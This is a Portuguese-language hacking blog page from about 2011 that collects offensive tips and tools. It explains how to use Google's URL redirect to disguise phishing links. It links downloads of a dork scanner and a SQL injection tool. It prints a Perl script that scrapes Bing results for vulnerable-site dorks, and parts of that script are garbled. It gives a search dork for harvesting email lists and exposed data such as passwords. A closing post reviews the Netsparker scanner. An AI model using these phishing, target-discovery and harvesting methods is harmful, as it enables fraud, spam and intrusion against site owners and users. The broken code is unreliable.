Um scanner dork antigo hospedei em uma vull pra testes espero que ajude alguem.

Attack phishing com redirecionamento google.



Utilizando o redirecionamento de links  do Google para attack phishings, como fazer isso é muito simples.

È simples assim:
http://www.google.com/url?q= + SEU LINK
ex:
http://www.google.com/url?q=http://blog.inurl.com.br
Com essa junção você e direcionado para uma pagina na qual ganhara um link com nome do sua pagina , com a seguinte frase:
 A página na qual você estava está tentando levar você para http://blog.inurl.com.br.
Copiando o link interno da tag http://blog.inurl.com.br. Temos acesso, á

Pronto seu link de redirecionamento.

domingo, 6 de março de 2011

Red Eye Scanner Free Edition

Versão Free do scanner Red Eye versão 1.5 contem Google Dorks, Scanner e Editor de Lista integrado.
Atualizações da Versão 1.5
Redução de 794bk para 228kb

Fonte: http://redeyecrew.wordpress.com/2010/07/26/red-eye-scanner-free-edition/

Baixar: http://www.multiupload.com/T2HT7AQHO0

Programa injetor de sql 10 anos de RED EYE CREW.

Um ótimo injetor de sql  Havij brasileiro.

 SQL INJECTION FREE para toda comunidade RED EYE.

10 anos de RED EYE CREW.
Versão 0.1 Beta
MD5:FF303B4F4902DD5A8AFE7DC911C7CB09


Fonte: http://redeyecrew.wordpress.com/2011/01/12/sql-injection-free/

Baixar: http://www.multiupload.com/J7EQ3IHW6L

Scanner dork em perl


Ele pode ser usado tando em OS-win como OS-linux
para usar em OS-win baixe o Activeperl, e utilizando dorks simples para seu scan.


Fonte do dork: http://forum.guiadohacker.com.br
Criador:PS1C0
SCANNER DORK




#!/usr/bin/perl
use LWP::UserAgent;

print "Specify dork: ";
$dork = ;
chomp($dork);
for ($i = 0; $i < 1000; $i += 10) {
$b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
$b->timeout(30);
$b->env_proxy;
$c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content;
$check = index($c, 'sb_pagN');
while (1) {
$n = index($c, '

if ($n == -1) {
last;
}
$c = substr($c, $n + 13);
$s = substr($c, 0, index($c, '"'));
print $s, "\n";
}
if ($check == -1) {
last;
}
} 

Extrair emails com google




Um simples dork para quem gosta de extrair listmail de sites com essa simples dork vai da uma grande ajuda.
Muitos desses dos link's acessados vem com nomes,datas,senhas, como um banco de dados
por isso disponho de uma ferramenta pra extração de email dos mesmos.
EXTRACTOR DE  EMAIL ONLINE.
Link:http://www.googlebig.com/sections/Email-Extractor/

Código pesquisa:+mail +@ +yahoo +hotmail +gmail ext:txt

sábado, 26 de fevereiro de 2011

Netsparker: um scanner de segurança web livre de falsos-positivos

 

Netsparker: um scanner de segurança web livre de falsos-positivos

O Netsparker é um scanner de segurança de aplicações web que, de acordo com os desenvolvedores, é completamente livre de falsos- positivos. De acordo com eles, o Netsparker possui uma nova tecnologia que pode confirmar as vulnerabilidades sob demanda, por isso é imune a falso-positivo.

Por exemplo, quando o Netsparker identifica um SQL Injection, ele consegue identificar como explorar a falha automaticamente e extrair a versão da aplicação. Quando este dado for extraído com sucesso, o programa vai informar que a falha foi confirmada.

O Netsparker consegue simular um atacante real com grande sucesso. Assim, consegue atacar sites que utilizam AJAX e JavaScript.

Embora o Netsparker seja pago, existe uma versão "Community" que compartilha muitas das funcionalidades presentes na versão paga. É capaz de detectar SQL Injection e XSS (Cross Site Scripting).

Infelizmente, o Netsparker não funciona no Linux. Ele suporta Windows XP (SP2 ou mais recente), Windows 7, Windows Vista (SP1 ou mais recente), Windows Server 2003 (SP1 ou mais recente) e Windows Server 2008 e precisa de Internet Explorer e .NET Framework 3.5 SP1 na máquina.

download : http://www.mavitunasecurity.com/communityedition/